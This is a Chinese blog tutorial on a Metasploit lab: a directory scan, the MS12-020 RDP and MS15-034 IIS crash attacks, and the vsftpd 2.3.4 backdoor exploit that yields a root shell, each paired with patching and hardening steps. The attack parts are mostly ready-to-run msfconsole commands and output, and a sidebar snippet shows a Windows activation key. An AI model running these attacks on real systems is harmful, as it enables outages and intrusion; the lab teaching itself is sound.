MSF辅助模块Auxiliary【linux网站目录扫描,rdp死亡之蓝】,Exploit【vsftpd笑脸漏洞】应用,CVE-2015-1635漏洞攻防实战,【rdp远程桌面,vsftpd软件】扩展

于 2024-04-05 06:17:19 发布
阅读量959 收藏 12
点赞数 20
分类专栏: MSF系统攻防 文章标签: 网络安全 系统安全 网络协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/h1008685/article/details/137376386
版权

MSF辅助模块Auxiliary

1、网站目录扫描(Linux靶机)

第一步:查找辅助脚本,使用辅助脚本
msf6 > search dir_scan//搜索dir_scan脚本
msf6 > use 0                       //使用编号为0的脚本
msf6 > set rhosts 192.168.10.143 //设置攻击目标
msf6 > run                         //运行脚本  
  [] Detecting error code
  [] Using code '404' as not found for 192.168.10.143
  [+] Found http://192.168.10.143:80/cgi-bin/ 404 (192.168.10.143)
  [+] Found http://192.168.10.143:80/doc/ 200 (192.168.10.143)
  [+] Found http://192.168.10.143:80/icons/ 404 (192.168.10.143)
  [+] Found http://192.168.10.143:80/index/ 404 (192.168.10.143)
  [+] Found http://192.168.10.143:80/phpMyAdmin/ 200 (192.168.10.143)
  [+] Found http://192.168.10.143:80/test/ 404 (192.168.10.143)        

第二步:验证网站目录

在物理机浏览器访问:  http://192.168.10.143/doc/            

2、DOS攻击(Windows靶机)

1)MS12-020 远程桌面漏洞-死亡之蓝

CVE-2012-0002(MS12-020)漏洞,利用Windows系统的远程桌面协议(RDP)存在缓存溢出漏洞,攻击者可通过向目标操作系统发送特定内容的RDP包造成操作系统蓝屏

 

msf6 > search  ms12-020          //搜索ms12-020脚本
Matching Modules
================
   #  Name                                              Disclosure Date  Rank    Check  Description
   -  ----                                              ---------------  ----    -----  -----------
   0  auxiliary/scanner/rdp/ms12_020_check                               normal  Yes    MS12-020 Microsoft Remote Desktop Checker
   1  auxiliary/dos/windows/rdp/ms12_020_maxchannelids  2012-03-16       normal  No     MS12-020 Microsoft Remote Desktop Use-After-Free DoS

  一个是ID为0  有一个关键词scanner ,发扫描的脚本
  一个是ID为1  有一个关键词dos  ,是拒绝服务攻击的脚本

msf6 > use 1                   //使用DOS攻击脚本    
msf6 auxiliary(scanner/rdp/ms12_020_check) > set rhosts 192.168.10.129        //设置攻击目标
msf6 auxiliary(scanner/rdp/ms12_020_check) > run                              //攻击

2)防御MS12-020漏洞

安装补丁Windows6.1-KB2621440-x64.msu

MSF辅助模块Exploit

CVE-2011-2523 vsftpd 2.3.4 后门漏洞(笑脸漏洞),此漏洞允许以root身份执行任意命令

msf6 > search vsftpd
msf6 > use 0
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set rhosts 192.168.10.143
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run 
[*] 192.168.10.143:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.10.143:21 - USER: 331 Please specify the password.
[+] 192.168.10.143:21 - Backdoor service has been spawned, handling...
[+] 192.168.10.143:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.Command shell session 1 opened (0.0.0.0:0 -> 192.168.10.143:6200)    //侵入成功
  whoami                 //显示当前用户
  root
  pwd                    //查看当前目录
  /root

 

CVE-2015-1635漏洞攻防实战

CVE-2015-1635(MS15-034)漏洞存在于HTTP协议堆栈(HTTP.sys)中,攻击者只要发送恶意http请求数据包,就可能远程读取IIS服务器的内存数据,或使服务器系统蓝屏崩溃

补丁文件:Windows6.1-KB3042553-x64

1)漏洞扫描(OpenVAS报告)
2)用poc脚本去验证漏洞真实存在

1)上传 cve-2015-1635.poc 到kali 系统

C:\Users\Administrator>scp -r C:\\Users\Administrator\OneDrive\桌面\cve-2015-1635.poc kali@192.168.10.224:/tmp/
kali@192.168.10.224's password:
cve-2015-1635.poc                                                                     100%  912   114.2KB/s   00:00

2)修改cve-2015-1635.poc 文件中的 ipaddr 为 win2k8 地址

  **ipAddr = "192.168.10.142"**

3)开始验证

[root@kali ~] # python2  cve-2015-1635.poc        //执行POC验证脚本
[*] Audit Started                 //审计开始
[!!] Looks VULN                   //看起来很脆弱(vulnerable)

3)MSF漏洞利用,DOS攻击服务器蓝屏

msf6 > search  ms15-034  
msf6 > use 0 
msf6 auxiliary(dos/http/ms15_034_ulonglongadd) > set rhosts 192.168.10.129
msf6 auxiliary(dos/http/ms15_034_ulonglongadd) > run
 //检查W2K8 主机是否蓝屏  

4)对IIS安全加固:关闭内核缓存

  1. 打开IIS管理器。
  2. 在连接树中,找到并选择你想要配置的网站。
  3. 在特性视图中,双击“输出缓存”。
  4. 在“操作”面板中,点击“编辑特性”。
  5. 取消选中“启用内核缓存”选项。
  6. 点击“应用”保存更改。

5)MSF漏洞利用,服务器不再蓝屏,成功防御了攻击
6)把内核缓存在开启(内核缓存可加快网站性能)
7)对系统进行加固:安装系统补丁
8)用POC脚本测试,发现提示目标服务器补丁已修复
9)MSF漏洞利用,发现目标服务器不在蓝屏

 

RDP的工作原理

RDP基于客户端/服务器模型工作。在这种模型中,远程桌面客户端连接到运行RDP服务器软件的远程计算机。数据交换经过加密,确保了传输过程中的安全性和隐私保护。

  • 客户端:任何请求连接的设备,需要安装RDP客户端软件。Windows系统自带远程桌面连接客户端,而其他操作系统(如macOS、Linux、iOS和Android)可以使用第三方客户端。
  • 服务器:被远程访问的计算机,需要配置并运行RDP服务器端。在Windows操作系统中,这通常意味着启用"远程桌面"功能。

主要特性

  • 图形界面传输:RDP提供了高效的图形界面数据压缩和传输机制,确保远程会话流畅。
  • 设备重定向:允许远程会话使用本地打印机、剪贴板、硬盘驱动器等资源。
  • 端口和安全性:默认情况下,RDP使用TCP端口3389。所有RDP会话数据都可以加密,减少安全风险。
  • 会话隔离:每个远程桌面会话都在其独立的虚拟会话中运行,不会影响其他用户的会话。

安全性和最佳实践

虽然RDP提供了便利的远程访问能力,但它也可能成为攻击者的目标。遵循一些最佳实践可以增强RDP会话的安全性:

  • 使用强密码:确保所有用户账户都使用强密码。
  • 更改默认端口:更改RDP的默认监听端口(3389),减少自动扫描的风险。
  • 限制访问:通过防火墙规则限制可以访问RDP服务的IP地址。
  • 启用网络级别认证(NLA):NLA为RDP会话提供了一个额外的认证层次,在会话建立之前进行。
  • 使用VPN:通过VPN连接访问RDP服务,增加一层网络安全保护。
  • 定期打补丁和更新:确保操作系统和RDP软件定期更新,以保护免受已知漏洞的攻击。

 vsftpd

vsftpd(Very Secure FTP Daemon,非常安全的FTP守护进程)是一款以安全为设计重点的FTP服务器软件,主要运行在Unix和类Unix操作系统上。它因其高性能、稳定性和尤其是对安全性的重视而广受好评。这里有一些关键点,让你对vsftpd有一个全面的了解:

主要特性

  • 安全性vsftpd提供了强大的安全特性,包括对SSL/TLS的支持,这使得通过vsftpd传输的数据可以进行加密,有效防止数据在传输过程中被截取或窃听。
  • 性能:即使在处理大量并发连接的情况下,vsftpd也能保持良好的性能,这使其成为高流量网站和服务的理想选择。
  • 简易配置:尽管vsftpd提供了丰富的配置选项,以满足不同用户的需求,但其默认配置已经足够安全,对新手友好,同时也为经验丰富的管理员提供了灵活的配置可能。
  • 广泛的应用vsftpd支持标准FTP协议,这意味着它可以与各种FTP客户端软件兼容,无论是命令行工具还是图形界面应用。

安装和配置

vsftpd可以通过大多数Unix和Linux发行版的包管理系统轻松安装。安装完成后,主要的配置工作是通过编辑其配置文件/etc/vsftpd/vsftpd.conf来进行,其中可以设置匿名访问、用户权限、加密选项等多种参数。

 

Zeddm
关注
专栏目录
[漏洞挖掘与防护] 01.漏洞利用之CVE-2019-0708复现及防御详解(含学习路线)
杨秀璋的专栏
07-10 794
这是作者新开的一个专栏——“漏洞挖掘与防护”。第一篇文章将详细介绍Windows远程桌面服务漏洞CVE-2019-0708),该高危漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击,堪比WannaCry。希望对入门的同学有帮助。您的点赞、评论、收藏将是对我最大的支持,感恩安全路上一路前行,如果有写得不好的地方,可以联系我修改。基础性文章,希望对您有所帮助!
CVE-2015-1635,MS15-034 漏洞复现
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
04-12 495
靶机环境: Windows Server 2012 R2 IIS 7 下载链接:ed2k://|file|cn_windows_server_2012_x64_dvd_915588.iso|3826081792|6A56281311F9FE6973F66CF36E2F50BE|/ 激活密钥:J7TJK-NQPGQ-Q7VRH-G3B93-2WCQD POC #coding=utf-8 #CVE-2015-1635,MS15-034 import requests def main(target):
MSFconsole进阶】auxiliary模块:信息收集、扫描、嗅探、指纹识别、口令猜测和Dos攻击等
05-22 4849
【渗透工具】MSFconsole:auxiliary模块
Kali——auxiliary辅助模块)-metasploit工具module模块衍生
qq_63167128的博客
03-07 1102
auxiliary辅助模块) 路径目录:usr/share/metasploit-framework/modules/auxiliary 1.通过使用auxiliary模块中的check模块来进行漏洞检测,查看该主机是否存在该漏洞 示例:主机是否存在ms12-020漏洞 use auxiliary/scanner/rdp/ms12_020_check //使用ms_12_020_check模块 show options //查看该模块需要哪些参数 set RHOST ip address //
笑脸漏洞vsftpd-2.3.4
inskeyzh的博客
11-12 3956
一、介绍 vsftpd存在一个后门漏洞,虽然该问题迅速得到了开发人员的修复及删除,但是仍有不少人已经下载安装了该漏洞版本。 vsftpd程序服务端会接收来自用户输入的用户名和密码,只要用户输入的用户名中包含连续的“:”和“)”字符,就会自动在6200端口打开一个后门。 二、准备 1.kali主机 2.靶机Metasploitable2-Linux 如未安装好以上虚拟机,可参考以下链接 Kali Linux 安装过程 超详细(图文并茂,通用版)_好好学习-CSDN博客_kali linux安装教
Metasploit——辅助模块(Auxiliary)
m0_62063669的博客
08-09 3524
简单网络管理协议(SNMP),由一组网络管理的标准组成,包含一个应用层协议、数据库模型和一组资源对象。/snmp/snmp_enum,如果能够获取只读(RO)或读/写(RW)权限的团体字符串,可以从中提取目标的补丁级别,运行的服务,用户名,持续运行时间,路由等信息。VNC:虚拟网络控制台,是一款优秀的远程控制工具软,基于 UNIX 和 Linux 操作系统的免费的开源软件,远程控制能力强大,高效实用。在使用之前,你需要先创建一个数据库连接用于存放扫描的数据、结果,然后加载wmap插件。...
CVE-2015-1635(MS15-034 )远程代码执行漏洞复现
热门推荐
m0_37638874的博客
06-10 2万+
  1 漏洞背景   2 漏洞影响   3 漏洞利用     3.1 服务器配置与搭建     3.2 测试       3.2.1 curl命令       3.2.2 Host字段       3.2.3 Range字段     3.3 攻击利用   4 防御措施1 漏洞背景2 漏洞影响3 漏洞利用3.1 服务器配置与搭建win7我们如何开启iis服务呢控制面板>程序和功能>打开或关闭windows功能>Internet信息服务>勾选Web管理工具和万维网服务 我们访问一下 如上所示证明开启了iis服
MSF辅助模块Auxiliary,Exploit应用CVE-2015-1635漏洞攻防实战
最新发布
04-04
MSF辅助模块Auxiliary,Exploit应用CVE-2015-1635漏洞攻防实战
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
在IT安全领域,保持软件和系统更新以修复漏洞至关重要,特别是对于像OpenSSH这样的关键组件。OpenSSH是一种广泛使用的安全工具,它提供了在不同主机之间进行安全远程登录和其他相关网络服务的功能。然而,随着时间的...
CVE-2021-1732-Exploit:CVE-2021-1732漏洞利用
03-06
**CVE-2021-1732漏洞详解** CVE-2021-1732是一个针对Microsoft Windows操作系统的重要安全漏洞,主要影响Windows 10版本1909的x64架构系统。这个漏洞是由于操作系统组件中的一个编程错误导致的,它可能被恶意攻击者...
提权辅助工具ATRoot Auxiliary
05-15
windows提权辅助工具,允许本地扩充,java编写,windows linux 漏洞比对工具
msf aux模块使用
Gjqhs的博客
03-07 1673
普及auxiliary模块的基本使用方法 简介 auxiliary辅助模块) 主要功能:执行扫描、嘎探、指纹识别等相关功能以辅助渗透测试。 与exploits模块的区别 exploits模块一般需要和payloads模块联合使用,通过exploits模块渗透成功后执行payloads模块中的代码。 auxiliary模块不需要和payloads模块联合使用 文件位置:/usr/share/metasploit-framework/modules/auxiliary auxiliary模块应用实例1
渗透测试工具MSF
2303_77223717的博客
07-08 1238
Metasploit Framework 简称MSF,是一款开源的安全漏洞检测工具。可以收集信息、探测系统漏洞、执行漏洞利用测试等,为渗透测试、攻击编码和漏洞研究提供了一个可靠平台,集成数千个漏洞利用、辅助测试模块
VSFTP 2.3.4(笑脸漏洞)漏洞详解
m0_64593235的博客
04-18 2022
VSFTPD 2.3.4(笑脸漏洞)漏洞详解
VSFTPD2.3.4笑脸漏洞复现
m0_60466340的博客
12-11 977
vsftpd2.3.4版本中有一个后门 ,在检测到用户名带有特殊字符:)时,会自动打开6200端口。 复现过程: 用nmap扫面本网段内的主机,发现有打开21端口,用于传输ftp的主机 探测该主机的ftp服务器版本信息,可以看到该版本是存在笑脸漏洞的版本 用netcat连接该主机的21端口,输入带有:)的用户名,和随便一个password 这时候就是以root的权限登录了,可以通过netcat查看6200端口的用户信息 ...
Win7之MS12-020死亡
GaLeng_Yang的博客
08-08 624
死亡屏利用RDP协议,基于3389远程桌面端口对目标主机进行攻击,使目标机系统瘫痪导致屏,严重影响着计算机的正常使用。
漏洞利用 --- VSFTPD 2.3.4 后门
weixin_62443409的博客
06-09 9397
VSFTPD 2.3.4 的攻击就是通过向21端口发送一个特定字节的序列来触发恶意的vsf_sysutil_extra()函数。一旦成功执行,就会在系统的6200端口打开一个后门,从而进行利用。
msf学习笔记(4)
Shadow 爬爬记
11-03 1117
MSF信息收集nmap扫描db_nmap -sV 192.168.1.1auxiliary扫描模块RHOSTS <>RHOST 192.168.1.1-24 192.168.1.1/24 files:/root/ip.txtarp扫描msf > use auxiliary/scanner/discovery/arp_sweep set INTERFACE ̵ RHOSTS̵ SHOST̵ S
使用metasploit(MSF)对windows的ms12-020漏洞进行利用的过程
D-river博客
11-10 1万+
前言攻击者向受影响的系统发送一系列特制 RDP 数据包,则这个漏洞可能造成拒绝服务攻击或允许远程执行代码。默认情况下,任何 Windows 操作系统都未启用远程桌面协议 (RDP,默认端口3389)。没有启用 RDP 的系统不受威胁。此实验对目标系统造成了DOS攻击。 0x01 实验环境攻击机:kali linux ip:192.168.8.130 目标机:windows server 200
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值